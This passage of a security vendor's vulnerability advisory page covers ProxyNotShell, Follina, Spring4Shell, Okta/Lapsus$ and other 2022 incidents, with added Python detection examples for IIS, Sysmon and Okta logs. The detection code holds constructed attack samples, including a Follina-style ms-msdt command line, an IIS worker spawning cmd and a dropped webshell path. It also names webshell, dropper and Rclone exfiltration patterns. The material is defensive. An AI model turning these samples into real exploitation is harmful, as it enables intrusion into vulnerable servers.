    • If you don't see URL Rewrite in this panel, you will need to install it manually. It is available for Exchange 2013/2016/2019 and is installed by default on Exchange 2016 CU22+ and Exchange 2019 CU11+. Manual download and install can be performed from this page. Be aware that the install requires an IISRESET.
    • Microsoft has updated its URL Rewrite instructions to set the Action Type to "Abort Request" instead of the original recommendation of "Send an HTTP 403 (Forbidden) Response".
    • Microsoft's original URL Rewrite pattern has been shown to be ineffective. The updated recommendation is to use this string instead: .*autodiscover\.json.*Powershell.*
    • It is also recommended to add an additional condition with the input {HTTP_COOKIE} and the pattern Email=autodiscover
    • Microsoft has released an updated script to automate the URL Rewrite mitigation. At the moment, this script applies Microsoft's original (ineffective) URL Rewrite rule. If you want to apply the effective, updated string and condition, you must do so manually. Microsoft's automation script can be found here.
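The following is an added example, not Microsoft's mitigation script and not Blumira detection content. It takes the original and updated URL Rewrite pattern strings from the steps above, compiles them as Python regexes, and runs them over a constructed IIS W3C log excerpt. That shows two things a practitioner wants to check: which requests each pattern would have blocked (the only difference between the two strings is the literal "@", so a request that encodes that character is covered only by the updated pattern) and how the same patterns can be used to hunt historical IIS logs for the attack. The log lines, addresses and hostnames are invented; the reduced field list and the cs(Cookie) field are assumptions about how logging is configured on a given server.

```python
"""Apply the ProxyNotShell URL Rewrite patterns to IIS log entries (added example)."""
import re
from urllib.parse import unquote

# The two request-blocking patterns quoted in the text, compiled as Python regexes.
# URL Rewrite uses ECMAScript syntax and ignores case by default; for patterns this
# simple that behaves the same as re.IGNORECASE here.
ORIGINAL_PATTERN = re.compile(r".*autodiscover\.json.*\@.*Powershell.*", re.IGNORECASE)
UPDATED_PATTERN = re.compile(r".*autodiscover\.json.*Powershell.*", re.IGNORECASE)
COOKIE_PATTERN = re.compile(r"Email=autodiscover", re.IGNORECASE)

# Constructed IIS W3C log excerpt; not real traffic. The field list is reduced for
# readability, and cs(Cookie) is an optional IIS log field that must be enabled for
# the {HTTP_COOKIE} condition to be auditable after the fact.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Cookie) sc-status
2022-09-30 08:01:02 GET /autodiscover/autodiscover.json - 198.51.100.10 - 200
2022-09-30 08:01:05 POST /autodiscover/autodiscover.json @example.test/powershell 198.51.100.77 Email=autodiscover/autodiscover.json%3F%40example.test 200
2022-09-30 08:01:09 POST /autodiscover/autodiscover.json %40example.test/powershell 198.51.100.77 Email=autodiscover/autodiscover.json%3F%40example.test 200
2022-09-30 08:02:00 GET /owa/ - 203.0.113.5 - 200
"""


def parse_w3c(text):
    """Parse a W3C extended log, honoring the #Fields directive for column names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows


def request_uri(row):
    """Rebuild what URL Rewrite sees as {REQUEST_URI}: path plus query string."""
    query = row.get("cs-uri-query", "-")
    return row["cs-uri-stem"] if query == "-" else f"{row['cs-uri-stem']}?{query}"


def classify(row):
    """Evaluate one log row against both URI patterns and the cookie condition."""
    uri = request_uri(row)
    cookie = row.get("cs(Cookie)", "-")
    return {
        "client": row["c-ip"],
        "uri": uri,
        "original_rule": ORIGINAL_PATTERN.match(uri) is not None,
        "updated_rule": UPDATED_PATTERN.match(uri) is not None,
        "cookie_condition": COOKIE_PATTERN.search(cookie) is not None,
        # Decoding first shows the only difference between the patterns is the literal '@'.
        "original_rule_after_decoding": ORIGINAL_PATTERN.match(unquote(uri)) is not None,
    }


def scan_iis_log(text):
    """Classify every request row in a W3C log."""
    return [classify(row) for row in parse_w3c(text)]


def would_be_aborted(text):
    """Rows the updated rule would abort: URI pattern AND cookie condition
    (URL Rewrite groups conditions with MatchAll by default)."""
    return [f for f in scan_iis_log(text) if f["updated_rule"] and f["cookie_condition"]]


if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

Point the same functions at a real ex*.log file from %SystemDrive%\inetpub\logs\LogFiles to review past traffic. The third constructed row is only an illustration of a request shape the narrower pattern does not cover; it is not a claim about the specific bypass Microsoft responded to.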

    How To Detect

    Organizations should collect logs with Sysmon on Exchange hosts to identify any malicious activity.

    Blumira customers can detect this attack at a number of positions within the kill-chain, keeping in mind that Exchange runs on top of the IIS process itself.

    • Potential Exchange ProxyLogon IIS Webshell Activity (Windows – Sysmon)
      • IIS process (w3wp.exe) spawns cmd or powershell processes
    • Malicious Webshell Connection to External IP (NGFW – IPS)
      • A webshell is identified connected outbound
    • Webshells by File Write (Windows – Sysmon)
      • IIS process (w3wp.exe) drops an asp, aspx, jsp, or php file.
    • Potential IIS Webshell Activity (Windows – Sysmon)
      • IIS Process (w3wp.exe) as %DefaultAppPool% spawns cmd.exe.
    • PowerShell Malicious Execution Detection: Posh C2, PowerShell Malicious Execution Detection: Cobalt Strike, PowerShell Malicious Execution Detection: PowerShell Empire, and PowerShell Empire Module (Windows)
      • Looking for patterns of known droppers via PowerShell exploitation
    • T1059.001 – PowerShell Fileless Script Execution
      • In memory execution of PowerShell scripts, e.g., IEX
    • Rclone Execution via Command Line or PowerShell (Windows)
      • Common attack pattern by groups once foothold is gained to exfiltrate data

    For further technical details, see:

    https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/

    Sign Up For Your Blumira Trial

    Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.

    Blumira’s trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Critical
    July 18, 2022

    Netwrix Auditor Bug Threatens Active Directory Domain

    What Happened

    An Insecure Object Deserialization vulnerability was discovered in Netwrix Auditor, an IT asset tracker and auditing platform. This flaw potentially enables threat actors to compromise Active Directory domains.

    The vulnerability affects all supported versions of Netwrix Auditor prior to 10.5.

    Netwrix has over 11,500 customers, according to the company, and has a robust MSP partner program.

    How Bad is This?

    A CVE identifier for the vulnerability is still pending, but Bishop Fox rates its severity as critical in its advisory. An attacker can submit arbitrary objects through an unsecured .NET remoting service to achieve remote code execution (RCE) on Netwrix Auditor servers.

    RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable servers. Additionally, compromising an AD domain gives attackers “the keys to the kingdom,” enabling them to perform a variety of malicious activities through the environment.

    What Should I Do?

    Organizations running Netwrix should immediately upgrade to the latest version of the software, and if possible, inventory all systems to discover any possible out-of-date installs of Netwrix Auditor. Blumira also recommends using a SIEM to discover attacker behavior in your systems.

    How To Detect

    There are still details needed on this vulnerability to determine detection methods. At the present time, general cybersecurity best practices are recommended, including using an endpoint detection and response (EDR) solution on all endpoints, ensuring that WAN firewalls are configured to not allow access on insecure or unneeded ports, and using a SIEM to detect attacker behavior.


    Critical
    May 31, 2022

    Microsoft RCE “Follina” Zero-Day (CVE-2022-30190) Found In MSDT, Office

    Note: Blumira’s security team is currently working to create an accurate detection rule to identify exploits of this vulnerability. We will update this post accordingly with new developments.

    Microsoft Security
    CVE


    Update (6/1/22 @ 11:00 AM ET): Using Blumira’s new detection rule, customers who are sending Windows endpoint logs to Blumira can now detect instances of CVE-2022-30190 being exploited in their environment. The detection rule has been automatically rolled out to the Blumira platform.

    What Happened

    A remote code execution (RCE) vulnerability was discovered in Microsoft Support Diagnostic Tool (MSDT) — a utility used to troubleshoot and collect diagnostic data — and Microsoft Office.

    Dubbed “Follina,” the flaw was discovered when an independent research team called nao_sec found a malicious Word document that loads HTML from an external URL through Word's remote template feature and uses the ms-msdt: URI scheme to execute PowerShell code.

    According to Microsoft, successfully exploiting the vulnerability can enable an attacker to download arbitrary remote code, and run it on a system with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.

    Testing is inconclusive on the latest version of Microsoft Office, including Insider and Preview versions. This may be patched or require additional testing to verify. At this time, it should be assumed that all versions of Microsoft Office are vulnerable.

    How Bad is This?

    This vulnerability has been scored as a 7.3, which indicates that the vulnerability is “High” severity, but does not reach the level of “Critical.” However, an RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable systems.

    What Should I Do?

    All organizations should be implementing email attachment and URL scanning, DNS filtering, and using a SIEM with detection capabilities to expose attacker behavior in an environment. Advanced anti-malware/EDR tools have also started to add detection rules into their products to detect successful use of this vulnerability.

    Using this vulnerability, attackers can leverage remote templates to load malicious code, which prevents Word from flagging the document as a threat. IT and security teams should take the opportunity to remind end users about the dangers of untrusted documents, and remote templates in general.

    Unfortunately, disabling Microsoft Office macros does not fix the issue. You should still consider disabling Office macros as a general security practice.

    However, according to Microsoft, you can disable the MSDT URL support protocol as a temporary fix:

    1. Run Command Prompt as Administrator.
    2. Back up the registry key: reg export HKEY_CLASSES_ROOT\ms-msdt filename (replace filename with the path of the backup file you want to create).
    3. Delete the key: reg delete HKEY_CLASSES_ROOT\ms-msdt /f

    This fix was confirmed via Twitter by Jake Williams, Executive Director of Cyber Threat Intelligence at SCYTHE, but the impact of this workaround in a large production environment is unknown. Before implementing it, make sure you have a plan to undo it once a security patch is released and verified to fix the vulnerability.

    How To Detect

    SIEMs and EDR tools should be on the lookout for child processes with sdiagnhost.exe as the parent process.
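The rule below is an added example written for this page; it is not a Blumira detection rule and does not reproduce one. It encodes the parent/child relationships named in the ProxyNotShell detection list earlier on this page (w3wp.exe spawning cmd.exe or powershell.exe, w3wp.exe writing a script file) together with the Follina relationships described here (an Office application spawning msdt.exe, any child of sdiagnhost.exe, an ms-msdt: URI on a command line), and runs them over constructed Sysmon-style records. Field names follow Sysmon's event data (Image, ParentImage, CommandLine, TargetFilename) for Event ID 1 (process creation) and Event ID 11 (file creation); the events themselves, paths and command lines are invented for the example.

```python
"""Parent/child process detections over Sysmon events (added example)."""
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".jsp", ".php"}


def _name(path):
    """Lower-cased file name of a Windows path, e.g. 'winword.exe'."""
    return PureWindowsPath(path).name.lower()


def detect(event):
    """Return the rule IDs an event matches (empty list if none)."""
    hits = []
    if event["EventID"] == 1:  # Sysmon process creation
        parent, child = _name(event["ParentImage"]), _name(event["Image"])
        cmdline = event.get("CommandLine", "").lower()
        if parent == "w3wp.exe" and child in SHELLS:
            hits.append("iis_worker_spawned_shell")        # ProxyShell/ProxyNotShell webshell activity
        if parent in OFFICE_APPS and child == "msdt.exe":
            hits.append("office_spawned_msdt")              # Follina delivery from a document
        if parent == "sdiagnhost.exe":
            hits.append("sdiagnhost_child_process")         # Follina payload execution
        if "ms-msdt:" in cmdline:
            hits.append("ms_msdt_uri_on_command_line")      # the protocol handler being invoked
    elif event["EventID"] == 11:  # Sysmon file creation
        ext = PureWindowsPath(event["TargetFilename"]).suffix.lower()
        if _name(event["Image"]) == "w3wp.exe" and ext in SCRIPT_EXTENSIONS:
            hits.append("iis_worker_wrote_script_file")     # webshell by file write
    return hits


# Constructed events; paths, users and command lines are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2022-09-30 08:01:06",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'cmd.exe /c "whoami"',
     "User": r"IIS APPPOOL\MSExchangeAutodiscoverAppPool"},
    {"EventID": 11, "UtcTime": "2022-09-30 08:01:07",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\inetpub\wwwroot\aspnet_client\x.aspx"},
    {"EventID": 1, "UtcTime": "2022-05-31 13:22:40",
     "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'C:\Windows\System32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c"'},
    {"EventID": 1, "UtcTime": "2022-05-31 13:22:43",
     "Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\sdiagnhost.exe",
     "CommandLine": "calc.exe"},
    {"EventID": 1, "UtcTime": "2022-05-31 13:30:00",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe"},
]


def run(events=SAMPLE_EVENTS):
    """Return (time, rule) pairs for every rule hit across the events."""
    return [(e["UtcTime"], rule) for e in events for rule in detect(e)]


if __name__ == "__main__":
    for when, rule in run():
        print(when, rule)
```

In production the same checks run against forwarded Sysmon events (Microsoft-Windows-Sysmon/Operational) rather than a list; the sdiagnhost.exe rule will also fire on legitimate troubleshooter use, so treat it as a lead to triage, not a confirmed exploit.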

    You can detect instances of the exploited vulnerability using Microsoft Defender:

    I’m getting this picked up by my Windows Defender now too. Word & RTF preview pane version. https://t.co/28YwAr5UGJ pic.twitter.com/hFCaXS0q2L

    — Gab (Steam: /id/inside | Ubi: Swift) (@pbcGABriel) May 31, 2022

    If you are using Microsoft Defender’s Attack Surface Reduction, you can enable the rule “Block all Office applications from creating child processes.” However, consider using Audit mode at first to ensure that you don’t notice any side effects in your environment.

    You can also remove the file association for ms-msdt, which can stop malware in infected documents from running. This can be done by deleting the file association from the Windows Registry or by using Kelvin Tegelaar’s PowerShell script.

    The current thinking in the infosec community is that this change has no adverse effect on Windows systems apart from disabling the Microsoft Office Troubleshooting Wizard, a rarely used feature; it may also break Microsoft Office licensing. If you apply this fix, track which workstations received it so that it can be reversed once a patch becomes available and has been verified.

    Update: Blumira customers can now detect instances of CVE-2022-30190 being exploited in their environment.


    Medium
    March 31, 2022

    Let’s All Calm Down About Spring4Shell


    What Happened?

    On March 30, 2022 rumors began to circulate that a remote code execution (RCE) vulnerability was discovered in Spring Core, the most widely-used lightweight open source Java framework. These rumors began because a Chinese researcher published what appeared to be proof-of-concept (POC) exploit code on GitHub, and then quickly deleted it.

    However, what we now know is that there is no actual broad threat to environments, and that the virality of the internet is perhaps too much for anyone at this point. This is a perfect example of potential blue team exhaustion and what can come from chasing unconfirmed potential threats. Information develops quickly and acting quickly is important at times, but having the full picture of risk is the most important first step.

    The continuous stream of zero days and ongoing issues has pushed the information security community and its related media into a continuous feeding frenzy, which a researcher on Twitter (whose account has since been deleted) took advantage of. There is currently no new risk to Spring Core, and the only known vulnerability associated with the CVE is in Spring Cloud Function.

    Around the same time as the RCE rumor, Spring Core changed how they handled deserialization, but it was not to prevent an RCE. Rather, it was to clarify that using certain deserialization methods from untrusted sources is not secure.

    CVE-2022-22963 is for Spring Cloud Functions, the serverless function components. An adversary could potentially leverage this vulnerability to remotely execute code on an application that was developed using Spring and runs a vulnerable version of Java Development Kit (JDK), according to the write-up on Spring Cloud’s website.

    The reported exploit requires JDK 9 or above.

    Update (3/31/22 at 11:30 AM ET): Shortly after this write-up went live, information about an RCE vulnerability in Spring Framework was published. According to VMware:

    “The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.”

    If you have the following setup, you may be vulnerable:

    • JDK 9 or higher
    • Apache Tomcat as the Servlet container
    • Packaged as WAR
    • spring-webmvc or spring-webflux dependency

    This does not mean that Spring Framework will not be impacted in the future as information is developed, or that your custom usage of Spring Framework is not vulnerable. However at this point, all prerequisites required to be vulnerable to this RCE require a customization of Spring that utilizes the vulnerable data binding.

    How Bad is This?

    Remote code execution is always a fairly big deal because it allows an adversary to execute malicious code on vulnerable servers; however, this shouldn’t induce panic in the way that Log4j did.

    POCs have been published that enable attackers to exploit this vulnerability, but it is unclear whether an attacker could realistically execute them. While some were able to replicate the POC, the number of prerequisites required for it to function indicates that this may have been a contrived example that identified unsafe deserialization uses. That is not the same as a genuinely vulnerable environment that can be exploited easily, e.g., Log4j, ProxyShell, etc.

    How Does This Compare To Log4j?

    At this point the severity bears no relation to Log4j; the name “Spring4Shell” was chosen to trigger that association, but the same type of threat does not exist. This is not to say that a vulnerability in Spring does not exist, but rather that this issue does not appear to be the threat it was purported to be.

    What Should I Do?

    Probably nothing!

    If you use Spring Cloud Functions and are exposing them to the internet, you should consider updating the version used and reviewing how they are utilized. Versions 3.1.6, 3.2.2 and unsupported older versions are all impacted by CVE-2022-22963 and should be updated to 3.1.7 or 3.2.3.

    While there may be a way to set up Spring in a way that an RCE is possible through unsafe deserialization of commands, it requires a large number of prerequisites to be a risk to the environment.


    Critical
    March 28, 2022

    Patch for Sophos Firewall: (CVE-2022-1040)

    An authentication bypass vulnerability (CVE-2022-1040) that allowed for remote code execution (RCE) was discovered in the User Portal and Webadmin of Sophos Firewall.

    What Happened?


    This vulnerability affects organizations running versions v18.5 MR3 and older of Sophos Firewall.

    How Bad is This?

    CVE-2022-1040 was issued a 9.8 rating on the CVSS scale; in other words, critical severity. RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable devices.

    What Should I Do?

    Sophos released hotfixes for the following versions, according to the company’s security advisory:

    • Hotfixes for v17.0 MR10 EAL4+, v17.5 MR16 and MR17, v18.0 MR5(-1) and MR6, v18.5 MR1 and MR2, and v19.0 EAP published on March 23, 2022
    • Hotfixes for unsupported EOL versions v17.5 MR12 through MR15, and v18.0 MR3 and MR4 published on March 23, 2022
    • Hotfixes for unsupported EOL version v18.5 GA published on March 24, 2022
    • Hotfixes for v18.5 MR3 published on March 24, 2022
    • Fix included in v19.0 GA and v18.5 MR4 (18.5.4)

    These patches should automatically apply when users have enabled “Allow Automatic Installation of Hotfixes” on their systems. Otherwise, admins must manually update the firewall.

    In general, it’s important to ensure that the User Portal and Webadmin are not exposed to the internet. Admins should disable WAN access to both by following Sophos’ instructions for device access best practices.


    Medium
    March 22, 2022

    Lapsus$ Claims To Breach Okta Customer Data

    Okta, an authentication services provider, is investigating a potential customer data breach after the hacker group Lapsus$ posted screenshots on Tuesday, March 22 of what appeared to be Okta’s internal environment on Telegram.

    What Happened?


    According to the Lapsus$ post, the group acquired superuser or admin access to Okta’s environment. The group included a screenshot of a hacker resetting the password for a Cloudflare Security Reliability Engineer to show their level of access.

    [Screenshot courtesy of Twitter user @vxunderground]

    Todd McKinnon, CEO of Okta, responded to the potential breach via Twitter, claiming that the incident was related to a contained breach in late January 2022.

    In late January 2022, Okta detected an attempt to compromise the account of a third party customer support engineer working for one of our subprocessors. The matter was investigated and contained by the subprocessor. (1 of 2)

    — Todd McKinnon (@toddmckinnon) March 22, 2022

    “Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January,” McKinnon tweeted.

    Update 3/22/22 @ 3:30 PM ET: According to Okta, an attacker had access to a support engineer’s laptop between January 16-21, 2022. However, the company assured that it has not been breached and remains fully operational, and that Okta customers do not need to take any further actions.

    What Is Lapsus$?

    Lapsus$ is a hacking group known for extorting companies and leaking data. Over the last few months, they have released data from NVIDIA and Microsoft after attempting extortion. Lapsus$ has confirmed attacks against Samsung, Vodafone, Ubisoft and more high profile targets as well.

    In many cases, Lapsus$ has been recruiting employees and insiders at companies to gain access into environments and steal data. This adds another layer of complexity for organizations in determining their attack surface exposures.

    [Image courtesy of BleepingComputer]

    How Bad is This?

    Okta has hundreds of thousands of users on their platform, including major enterprise customers such as JetBlue, T Mobile, FedEx, and Major League Baseball (MLB).

    A confirmed breach could potentially compromise those customer accounts.

    What Should I Do?

    If you are running Okta, review your Okta system and audit logs for anomalous administrative actions and access within your environment. Shut off Okta support access if you previously enabled it to prevent third-party contractors from accessing your account, as seen in the Lapsus$ hack.
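The review described above can be scripted. The following is an added example and not Okta or Blumira code: it reads System Log events in the JSON shape Okta's API returns and flags three things worth a human look after an incident like this one: any event whose type falls under Okta support impersonation (the mechanism behind the support access mentioned above), sensitive administrative actions such as password resets and MFA factor deactivation, and activity from a country you do not expect. The event type names are taken from Okta's System Log event catalog to the best of my knowledge and should be confirmed against your own tenant's log; the events, tenant, people and addresses are constructed for the example.

```python
"""Flag Okta System Log events worth reviewing after a support-access incident (added example)."""
import json
from collections import Counter

# Event type names as I understand Okta's System Log catalog; verify against your tenant.
IMPERSONATION_PREFIX = "user.session.impersonation."
SENSITIVE_EVENT_TYPES = {
    "user.account.reset_password",
    "user.mfa.factor.deactivate",
    "system.api_token.create",
    "user.lifecycle.create",
    "group.user_membership.add",
}
EXPECTED_COUNTRIES = {"United States"}  # assumption for the example tenant

# Constructed events in the System Log JSON shape; tenant, people and addresses are invented.
SAMPLE_LOG = json.dumps([
    {"published": "2022-03-21T14:02:11.000Z", "eventType": "user.session.start",
     "actor": {"alternateId": "alice@example.com", "type": "User"},
     "client": {"ipAddress": "192.0.2.10", "geographicalContext": {"country": "United States"}},
     "outcome": {"result": "SUCCESS"}, "target": []},
    {"published": "2022-03-21T14:10:00.000Z", "eventType": "user.session.impersonation.grant",
     "actor": {"alternateId": "it-admin@example.com", "type": "User"},
     "client": {"ipAddress": "192.0.2.11", "geographicalContext": {"country": "United States"}},
     "outcome": {"result": "SUCCESS"}, "target": []},
    {"published": "2022-03-21T14:15:30.000Z", "eventType": "user.session.impersonation.initiate",
     "actor": {"alternateId": "support-engineer@vendor.example", "type": "User"},
     "client": {"ipAddress": "198.51.100.20", "geographicalContext": {"country": "Netherlands"}},
     "outcome": {"result": "SUCCESS"}, "target": None},
    {"published": "2022-03-21T14:16:05.000Z", "eventType": "user.account.reset_password",
     "actor": {"alternateId": "support-engineer@vendor.example", "type": "User"},
     "client": {"ipAddress": "198.51.100.20", "geographicalContext": {"country": "Netherlands"}},
     "outcome": {"result": "SUCCESS"},
     "target": [{"alternateId": "bob@example.com", "type": "User"}]},
])


def load(raw=SAMPLE_LOG):
    """Parse a JSON array of System Log events (the shape /api/v1/logs returns)."""
    return json.loads(raw)


def review(events, expected_countries=EXPECTED_COUNTRIES):
    """Return one finding per event that warrants a human look, with the reasons."""
    findings = []
    for e in events:
        event_type = e["eventType"]
        client = e.get("client") or {}
        country = (client.get("geographicalContext") or {}).get("country")
        reasons = []
        if event_type.startswith(IMPERSONATION_PREFIX):
            reasons.append("okta_support_impersonation")
        if event_type in SENSITIVE_EVENT_TYPES:
            reasons.append("sensitive_admin_action")
        if country and country not in expected_countries:
            reasons.append("unexpected_country")
        if reasons:
            findings.append({
                "published": e["published"],
                "eventType": event_type,
                "actor": e["actor"]["alternateId"],
                # 'target' can be null in real events, hence the 'or []'.
                "targets": [t.get("alternateId") for t in (e.get("target") or [])],
                "ip": client.get("ipAddress"),
                "reasons": reasons,
            })
    return findings


def actors_by_finding_count(findings):
    """Which actors generated the most flagged events; a quick pivot for triage."""
    return Counter(f["actor"] for f in findings)


if __name__ == "__main__":
    for f in review(load()):
        print(f["published"], f["actor"], f["eventType"], ",".join(f["reasons"]))
```

To run this against a real tenant, page through /api/v1/logs with a read-only API token and a since= filter covering the window of concern, and extend SENSITIVE_EVENT_TYPES with the admin actions that matter in your environment.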

    It’s also worth taking this opportunity to review third-party solutions that you are running in the cloud. A large company is not necessarily secure; it depends how that vendor allows your data to be accessed. Reach out to your customer success managers to determine if there is unnecessary access by third parties into your environments as was seen within the Okta hack.

    The Importance of Logging

    When a threat actor uses stolen credentials to breach your environment, having visibility into your environment is crucial. A security information and event management (SIEM) platform can correlate data, including data from authentication providers such as Okta, and alert on suspicious activity.

    If a threat actor like Lapsus$ uses credentials to pivot into an environment, it’s important to look at endpoint logs to detect suspicious behavior — for example, downloading large amounts of data, logging in from infrequently used countries, or mass changing file permissions. A threat detection and response platform eliminates the need to look at raw logs and alerts you about suspicious behavior.

    Retaining logs is especially important for incident response, allowing teams to go back and connect the dots to determine how an attacker infiltrated the environment and what systems are compromised.


    Critical
    March 14, 2022

    Vulnerabilities (CVE-2022-26500, 2022-26501) in Veeam

    Two critical vulnerabilities (CVE-2022-26500 and CVE-2022-26501) were discovered in Veeam Backup and Replication that allow potential adversaries to remotely execute code without authentication. 

    What Happened?


    Another vulnerability, CVE-2022-26503, was discovered in Veeam Agent for Microsoft Windows that allows for local privilege escalation (LPE).

    Positive Technologies, a Russia-based cybersecurity company, uncovered all three flaws.

    How Bad is This?

    Both remote code execution (RCE) vulnerabilities (CVE-2022-26500 and CVE-2022-26501) were issued a 9.8 rating on the CVSS scale; in other words, critical severity. RCE is one of the most dangerous types of flaws. Combined with the fact that no authentication is needed makes this a ripe attack vector for ransomware groups and other cybercriminals.

    The LPE flaw found in Veeam Agent for Microsoft Windows is less critical with 7.8 CVSS rating, but it is still considered high severity.

    Ransomware groups might show an interest in this CVE. https://t.co/ilEQ4dHsXn

    — Kevin Beaumont (@GossiTheDog) March 13, 2022

    Veeam Backup and Replication is a recovery solution for cloud, physical and virtual workloads. Veeam is common within SMB and MSP environments and, by design, holds highly privileged access to the systems and data it backs up.

    The good news is that no exploits are publicly available yet, according to a Kevin Beaumont (@GossiTheDog) tweet. However, it’s likely a matter of time until exploits are released.

    What Should I Do?

    Fortunately, there are patches available that resolve the issues; immediately patch to mitigate your risk.

    If you’re unable to patch, Veeam has offered instructions on how to temporarily mitigate the risk:

    “Stop and disable the Veeam Distribution Service. The Veeam Distribution Service is installed on the Veeam Backup & Replication server and servers specified as distribution servers in Protection Groups.”


    Medium
    March 3, 2022

    Defend Against Russian-Sponsored Cyberattacks

    Russian-sponsored threat actors have already distributed cyberattacks via new malware and wiperware such as Cyclops Blink and HermeticWiper. As tensions between Ukraine and Russia escalate, there’s potential for increased cybersecurity risk against targets across the world.


    We’ve witnessed this historically during previous unrest. For example, the conflict that followed the 2014 Ukrainian Maidan revolution eventually produced the 2017 NotPetya wiperware campaign, which extended well beyond Ukraine’s borders and impacted a number of organizations that had Ukrainian assets.

    However, organizations of all sizes and industries — even those that aren’t affiliated with Ukrainian assets — should be prepared to respond to state-sponsored cyberattacks. Threat actors are opportunistic, and will likely target environments without proper security controls — including small and mid-sized businesses that often lack resources — because they are easy wins.

    Russian advanced persistent threats (APTs) follow similar playbooks to other highly-effective groups; these techniques, tactics, and procedures (TTPs) are not secret.

    It’s important to be aware of these tactics and detect them early enough to stop an attack in progress. Here are some TTPs, mapped to the MITRE ATT&CK Framework, that Russian state-sponsored threat actors have been known to use.

    Initial Access

    According to MITRE, initial access techniques use various entry vectors to gain an initial foothold within a network. Initial access is an especially important tactic to detect because it occurs so early on in the cyber kill chain.

    Russian threat actors have used the following techniques to gain initial access before launching a cyberattack:

    External Remote Services

    External remote services such as VPNs and Remote Desktop Protocol (RDP) are common ways for attackers to gain a foothold in an environment. Most notably, state-sponsored actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379, vulnerabilities that affect Pulse Secure, Palo Alto GlobalProtect and Fortinet Fortigate.

    Upgrading to the latest version of VPN software is crucial. Since a malicious actor could have already exploited the VPN to steal credentials, it’s important to also reset the VPN’s credentials after patching.


    RDP attack data from Blumira’s honeypots

    RDP is another commonly-exploited external service. Avoid relying on RDP if at all possible. If you must use RDP, follow these security best practices:

    • Never allow RDP to be internet-facing
    • Configure Network Level Authentication (NLA) and similar protections for RDP.
    • Ensure that any and all remote access flows through a proper virtual private network (VPN) connection protected by two-factor authentication (2FA) whenever possible.
    • Limit the number of users that need RDP access and restrict that access to specific source IPs.

    Credential Access

    Brute Force

    In a brute-force attack, threat actors rely on automated software to generate a large number of consecutive guesses as to the value of the desired data, such as a password.

    From 2019 to 2021, GRU — Russia’s military intelligence group — launched a brute-force campaign that targeted hundreds of government and private sector organizations worldwide, specifically organizations running Microsoft 365 cloud services. Threat actors used a Kubernetes cluster to perform password spraying techniques on a larger scale.

    To defend against brute force attacks, organizations should deploy multi-factor authentication (MFA), limit the number of times a user can unsuccessfully attempt to log in, and temporarily lock out users who exceed the specified maximum number of failed login attempts.

    Password Spraying

    Password spraying, a variant of a brute-force attack method, is a common tactic used by Russian state-sponsored threat actors. Password spraying takes a large number of usernames and loops them with a single password, applying that to multiple accounts over a period of time to gain access into an environment.

    In October 2021 Nobelium, the Russian state-sponsored actors that were also responsible for the 2020 SolarWinds attack, gained access to privileged accounts in MSPs and resellers using a variety of techniques — password spraying being one of them — and then leveraged that access to attack the service providers’ customers.

    The most effective way to prevent password spraying is two-factor or multi-factor authentication. Organizations can also monitor their identity platforms for persistent use of a single IP address to attempt logins against multiple accounts. For Windows hosts, it’s important to also enable more robust logging to get visibility into password spraying attacks; Sysmon is a good way to extend Windows’ default logging capabilities.

    A dynamic blocklist can stop an attack in its early stages by automatically blocking IP addresses that are attempting to perform password spraying.

    Steal or Forge Kerberos Tickets: Kerberoasting

    Russian state-sponsored APT actors have performed “Kerberoasting,” an offline cracking technique in which actors abuse valid Kerberos ticket-granting services to obtain valid Service Principal Names (SPN) within an Active Directory (AD) domain. Any instance of Kerberoasting in an environment should be considered a critical threat.

    There are a few ways to detect Kerberoasting attacks; one way is to create a honey credential (or honeytoken) that exists solely to act as a canary.

    Learn More About Detecting Kerberoasting Attacks >

    Persistence

    During the persistence phase, adversaries attempt to maintain their foothold on systems.

    Web Shell

    Hours before Russia invaded Ukraine on February 24, a new form of disk-wiping malware was used to attack organizations in Ukraine. Part of that campaign included installing web shells weeks prior to the attack. Web shells were also used by the Russian GRU cyber military group.

    To identify the creation of web shells in your environment, review web accessible directories for newly created .php, .asp, .aspx, and .jsp files.

    Read More About How To Detect Web Shells >
